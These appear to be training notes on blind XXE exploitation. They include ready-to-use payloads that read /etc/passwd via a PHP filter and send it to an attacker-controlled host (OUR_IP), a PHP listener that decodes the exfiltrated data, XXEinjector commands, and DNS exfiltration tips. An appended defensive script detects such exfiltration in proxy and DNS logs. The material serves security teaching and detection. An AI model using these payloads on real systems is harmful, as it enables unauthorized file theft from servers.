These notes cover the concepts and techniques behind blind data exfiltration using XXE vulnerabilities when the target does not display any XML entity output or PHP errors.


1. Blind Data Exfiltration Overview

  • Blind XXE Vulnerability:
    • The web application is vulnerable to XXE, but does not show any output from the XML entities.
    • Direct methods (e.g., outputting file contents in the response) are ineffective.
  • Challenge:
    • No visible XML entity output or PHP runtime errors to leverage.
    • Requires an alternative method to retrieve sensitive file contents.

2. Out-of-Band (OOB) Data Exfiltration

  • Concept:

    • Force the vulnerable server to send the sensitive data to an attacker-controlled server.
    • The same approach is used for other blind injection classes (blind SQLi, blind command injection, blind XSS, etc.): the data leaves through a channel other than the HTTP response.
  • Approach:

    1. File Reading with PHP Filter:

      <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

      The base64 encoding keeps newlines and XML-special characters in the file from breaking the XML or the URL the content is later placed in.
    2. OOB Entity Declaration:

      <!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

      A parameter-entity reference such as %file; inside a markup declaration is not allowed in the document's internal subset, so these two declarations live in the external xxe.dtd that step 3 loads rather than in the DOCTYPE itself.
    3. Payload Assembly:

      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE email [
        <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
        %remote;
        %oob;
      ]>
      <root>&content;</root>

      When processed, the server makes a request to your server like:

      http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB

      where WFhFX1NBTVBMRV9EQVRB is the base64-encoded file content.

  • Server-Side Decoding:

    <?php
    // Decode the base64 value from the ?content= parameter and write it to the
    // error log, which PHP's built-in server prints to its terminal.
    if(isset($_GET['content'])){
        error_log("\n\n" . base64_decode($_GET['content']));
    }
    ?>

    Then start PHP's built-in web server from the directory containing this script:

    php -S 0.0.0.0:8000

3. Automated OOB Exfiltration with XXEinjector

  • Tool Overview:

    • XXEinjector automates blind XXE attacks, including error-based, CDATA source exfiltration and OOB XXE.
  • Setup Steps:

    1. Clone the Tool:

      git clone https://github.com/enjoiz/XXEinjector.git
    2. Prepare the Request File:

      • Capture the HTTP request (using Burp Suite) and save it with the XML body cut after its first line (the XML declaration) and replaced by the marker XXEINJECT, e.g. in /tmp/xxe.req:

        POST /blind/submitDetails.php HTTP/1.1
        Host: 10.129.201.94
        ...
        
        <?xml version="1.0" encoding="UTF-8"?>
        
        XXEINJECT
        
    3. Run the Tool:

      ruby XXEinjector.rb --host=[YOUR_IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
      • Flags:
        • --host and --httpport: Your attack server details.
        • --file: The request file with the XML marker.
        • --path: File path to exfiltrate.
        • --oob=http: Use HTTP for out-of-band communication.
        • --phpfilter: Base64-encode the file content.
    4. Retrieving the Exfiltrated Data:

      • Exfiltrated files are stored under the tool’s Logs directory. For example:

        cat Logs/10.129.201.94/etc/passwd.log

4. Additional Tips

  • DNS OOB Exfiltration:

    • Instead of URL parameters, you can place the encoded data in a subdomain (e.g., ENCODED.our.website.com).
    • Tools like tcpdump can capture DNS queries to reconstruct the data.
  • Decoding the Data:

    echo "WFhFX1NBTVBMRV9EQVRB" | base64 -d
  • Practical Usage:

    • These techniques apply to blind XXE vulnerabilities where the application does not display any output.
    • They are often used in advanced penetration testing exercises and in real-world scenarios where direct feedback is not available.
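A defender-side counterpart to the HTTP and DNS channels described in sections 2 and 4, added here as an example and not part of the original notes: it scans constructed egress-proxy and DNS query log lines for outbound requests whose query values or leftmost hostname labels decode to readable text, which is what base64-encoded exfiltration of a file such as /etc/passwd looks like from inside the network. The log formats, the 10.10.1.5 client and the 203.0.113.7 listener address are assumptions.

```python
import base64
import re

# Constructed egress-proxy log, "<client> <method> <url>"; the 203.0.113.7 listener is assumed
PROXY_LOG = """\
10.10.1.5 GET http://updates.example.internal/check?ver=2
10.10.1.5 GET http://203.0.113.7:8000/?content=WFhFX1NBTVBMRV9EQVRB
10.10.1.5 GET http://203.0.113.7:8000/?content=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=
10.10.1.5 POST http://api.example.internal/submit?id=42&token=abc123"""

# Constructed DNS query log, "<client> <qname>", mirroring the ENCODED.our.website.com pattern
DNS_LOG = """\
10.10.1.5 updates.example.internal
10.10.1.5 WFhFX1NBTVBMRV9EQVRB.our.website.com
10.10.1.5 mail.example.internal"""

B64_RE = re.compile(r"^[A-Za-z0-9+/_-]+={0,2}$")  # base64 or base64url (DNS-safe) alphabet

def decode_blob(value, min_len=16):
    """Return the printable text a base64/base64url blob decodes to, else None.
    Exfiltrated system files and configs are text, so a decodable printable value is suspicious."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value.replace("-", "+").replace("_", "/"), validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None

def scan_proxy_log(log):
    """Flag outbound HTTP requests whose query-string values decode to readable text."""
    hits = []
    for line in log.splitlines():
        client, _method, url = line.split(" ", 2)
        for pair in filter(None, url.partition("?")[2].split("&")):
            name, _, value = pair.partition("=")
            decoded = decode_blob(value)
            if decoded is not None:
                hits.append({"client": client, "url": url, "param": name, "data": decoded})
    return hits

def scan_dns_log(log):
    """Flag DNS queries whose leftmost label decodes to readable text."""
    hits = []
    for line in log.splitlines():
        client, qname = line.split(" ", 1)
        decoded = decode_blob(qname.split(".")[0])
        if decoded is not None:
            hits.append({"client": client, "qname": qname, "data": decoded})
    return hits
```

Running scan_proxy_log(PROXY_LOG) and scan_dns_log(DNS_LOG) flags the two ?content= requests and the encoded subdomain while leaving the ordinary update, API and mail lookups alone.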

Conclusion

  • Blind XXE requires creative methods (like OOB exfiltration) to retrieve data when direct output is not available.
  • OOB techniques leverage external requests (HTTP/DNS) to send encoded file content to an attacker-controlled server; they therefore depend on the application server being allowed to make outbound connections.
  • Automation tools such as XXEinjector help streamline and manage the exfiltration process.